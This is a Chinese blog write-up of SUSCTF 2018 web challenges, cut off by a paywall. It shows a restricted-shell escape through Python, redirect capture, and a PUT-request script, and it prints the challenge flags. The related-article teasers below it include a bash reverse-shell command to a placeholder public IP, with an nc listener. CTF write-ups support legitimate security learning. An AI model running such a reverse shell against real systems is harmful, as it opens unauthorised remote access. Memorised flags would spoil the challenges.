SUSCTF 2018 做题记录

最新推荐文章于 2025-07-08 01:43:31 发布
最新推荐文章于 2025-07-08 01:43:31 发布
阅读量7.2k 收藏 9
点赞数 2
CC 4.0 BY-SA版权
分类专栏: CTF Web 文章标签: CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u011377996/article/details/80586726
本文记录了作者参加SUSCTF 2018时的解题过程,主要涉及Web安全领域。文章详细介绍了如何通过沙盒绕过、参数传递、XSS、SQL注入等技巧解决minBash、faster、put、calculator、getshell、babyxss、babyxss2和Sqli_update等挑战。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

最近好久都没做题目,刚好上次搭的题目还在,就不要浪费了,记录记录做题过程吧

正文

minBash

这个题目考的点是沙盒绕过,第一次玩这个东西??反正进去之后尝试ls,cat,file等各种那个命令均无效果,都会显示
-rbash: ls: command not found
发现有一篇好文章,有空瞅瞅:http://cauc.me/2017/11/16/python沙盒绕过/
一开始谷歌一下,发现解决办法是这样的

export PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin

输入之后发现还是不行显示 -rbash: PATH: readonly variable
我们可以尝试python里面的库去执行,用的是os库里面的listdir函数

>>> import os
>>> os.listdir('.')

注意函数里面的.代表的是当前目录,而..代表的是上级目录,也可以是绝对路径
得到当前目录的结果为

 ['.bash_logout', '.profile', '.bashrc', 'bin', 'c8049f64c8080af25f414b15cb6f80c3']

检验一下那个一串的东西是文件还是文件夹

>>> os.path.isfile('c8049f64c8080af25f414b15cb6f80c3')

发现是文件,这里提供两种方法读取文件,
第一种直接用Python读取文件

>>> f = open('c8049f64c8080af25f414b15cb6f80c3','rb')
>>> f.read()

得到结果

'SUSCTF{e6b729cdf8885b16e7b949e85772e340}\n'

另一种是,返回到Linux命令行用strings命令

strings c8049f64c8080af25f414b15cb6f80c3

得到结果

SUSCTF{e6b729cdf8885b16e7b949e85772e340}

faster

题目说的快一点,那就试一下抓包好了,直接得到flag,这里是存在302跳转的,会跳转到1ndex.php,一开始我一直这个页面抓包可坑了,以后要注意直接从打开题目地址那一刻开始抓包-_-||
C7cZ1H.png

还有另一种做法就是直接curl一波就好了。。。不多说,水题一个

put

打开题目发现这样一句话

put me a message then you can get the flag

这个题目是考了传参的方式,水题。。。。
我用的两种办法
第一种
直接利用火狐的F12插件去完成put类型的传参
C7cmjA.png
查看回应发现一段base64,U3VzY3Rme3JlcXVlc3RfaW5fcHV0X21ldGhvZH0=,解码得到flag

第二种利用python写脚本上传

#!/usr/bin/python
# Author:0verWatch
# coding:utf-8

import base64
import requests


url = 'http://192.168.1.103:4447'

res = requests.session()
ans = res.put(url=url,data='message')
print base64.b64decode(ans.content)

calculator

C7cktO.png
这个

最低0.47元/天 解锁文章

200万优质内容无限畅学
ctf crypto工具篇
STARSG0d的博客
11-06 3186
ctf大整数运算 在ctf比赛中crypto中经常会有一些大整数的运算,比较麻烦,这篇文章我将介绍一些工具,以及使用方法,十分方便。 Big Integer Calculator v1.12 下面两排是计算公式,包括加法,减法,模运算等 在Base中选择不同的进制运算 没一个数值都有“CL”清除功能,“CLEAR ALL”清除全部 下载地址:https://bbs.pediy.com/...
2018 SCUCTF web题:cat?非常规题解
博客
12-19 1901
主要思路 1.寻找可以写入的目录 2.通过 > 构造文件名,在通过 ls -th>g 将命令写入文件 3.通过bash -i >& /dev/tcp/你的公网ip/监听的端口 0>&1构造反弹shell 4.在服务器使用 "nc -lnvp 相应端口" python脚本如下 # -*- coding: utf8 -*- import requests im...
2018 SUCTF pass
ACdream
06-07 472
思路很棒的一个题,对AES-CBC模式的攻击也不是一次两次了,其实题目也给了思路,只是自己不清楚原理,导致看不懂提示做不出来题目代码:#coding: UTF-8 import socket import flag from Crypto.Cipher import AES def padding(message): toPadByte = 16 - len(message) % 16 ...
[SUCTF 2018]GetShell
2301_81040377的博客
07-19 657
随便上传了个文件发现后缀被转为php也就是说会被解析成php文件。没有东西怎么构造字符串,那么汉字也是在可控范围内的,这是一个特性。上面两个payload是别的师傅构造的这个是我自己构造的。过滤了怎么办呢,没关系,我们只要有php头即可正常解析。基本是和自增差不多的只不多我们这里使用取反来做。的时候不能直接写我就是贪了然后浪费了一些时间。这道题原理不难就是fuzz比较难做。最后把格式调整一下上传的是这个。那么这道题就可以任意命令执行了。那么我们要构造一个shell。诶那么这里思路就很明确了。
CTFhub技能树HTTP协议(302跳转)
最新发布
weixin_45604830的博客
07-08 903
提示:本文资料仅用于知识学习。本题主要是通过“阻止”302重定向,以访问包含Flag的index.php页面。HTTP中的重定向和请求转发:重定向是客户端来实现的,服务器只是提供一个新的地址供客户端访问。请求转发是服务器来实现,服务器内部将请求‌移交‌给对应的服务处理。
[SUCTF 2018]annonymous
shinygod的博客
09-18 170
create_function匿名命名规则
BUUCTF:[SUCTF 2018]GetShell
末初 · mochu7
08-01 2136
题目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
susctf
06-20
### 关于SUSCTF技术挑战与活动详情 SUSCTF是一项专注于网络安全领域的技术竞赛,旨在通过实际操作和解决问题来提升参与者的技能水平。此类活动通常包括多个技术方向的挑战,例如Web安全、密码学(Crypto)、逆向...
2018SUCTF部分wp
Risker
05-28 3067
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道题只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...
SUSCTF2022 Writeup:Dest0g3 Team的Java挑战解析
作者Dest0g3分享了在SUSCTF2022比赛中遇到的一些挑战和解决方法,其中涉及到Java反序列化漏洞的利用。 首先,讨论的是一个名为"babygadgetv1.0"的Web题目。作者最初认为这可能是一个涉及Tomcat服务器和EL...
ctf---curl的使用
weixin_43803070的博客
05-12 5590
** bugku-web基础$_GET ** curl http://123.206.87.240:8002/get/?what=flag curl -I http://123.206.87.240:8002/get/ ** bugku-web基础$_POST ** curl -X POST http://123.206.87.240:8002/post/ -d "what=flag...
一次有关算法的安卓CTF
01-21
某年的CTF大赛题目 总结:遇到算法别头大,耐心、细心,让自己静下来。 点开之后长这样子,随便输入几个字符,提示错误。 查壳发现没有壳。 直接使用Jeb进行反编译。 看出来了,突破口是this.b.check()这个函数。 package ctf.bobbydylan; import android.content.Context; import android.content.Intent; import android.os.Bundle; public class M extends T { public M() { super(); } pu
2016华山杯ctf安卓题目
06-17
2016年华山杯ctf安卓题目
CTF中的curl命令
XINO
02-23 3551
简单理解curl命令,顺便看看在ctf中咋出
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1522
第一次做,拿到题目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
论剑场web6、web7、web8、web9、web10
cc菜的一批
12-30 1265
web6: 以为是sql注入,输入了一下,发现IP被禁止。那么模拟一下请求头127.0.0.1 找了一圈发现,密码是在HTML信息的最下面了。 登录账号admin,密码test123,得到flag web7 注册后随便登录个账号,显示权限不够。 看请求头cookie,发现规律如下: r: 351e766803 d63c7ede8cb1e1c8db5e51c63fd47cff u: ...
一道CTF题学习php的curl扩展模块
bj5716的博客
05-30 4313
前言作为一个web安全学的很痛苦,还始终学不会的人,决定要好好学web安全了。这次见识了一下DDCTF的题目,难度对于我来说非常高,所以决定写一些学习总结,也不算wp,就是笔记这种吧,这篇文章以学习PHP的CURL模块为主,用这道很基础的SQL注入题来引一下子。题目描述一出来什么都没有,只有一个这个提示。所以说,这个就下意识改一下头吧,添加一个X-Forwarded-For项就可以了对吧。而且这个...
SUSCTF 2019
皮三宝好菜的博客
04-14 1121
SUSCTF 2019 http://www.psbazx.com/2019/04/14/susctf-2019/ 懒得搬过来了。。。
Android逆向二—CTF逆向实战(四个方向)
土豆的博客
06-04 4013
Somethingu have to know: 虽然Android平台使用Java来开发应用程序,但Android程序却不是运行在标准的Java虚拟机上,而是将Java字节码转换成Dalvik字节码,并打包到一个DEX可执行文档当中,Dalvik虚拟机通过解析DEX文件来执行这些字节码。 因此我们想了解安卓逆向,就要先了解一下Dalvik的语法。 目录 Somethingu have to know: 0x01 工具准备: 0x02 语法了解: 0x03 练习解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值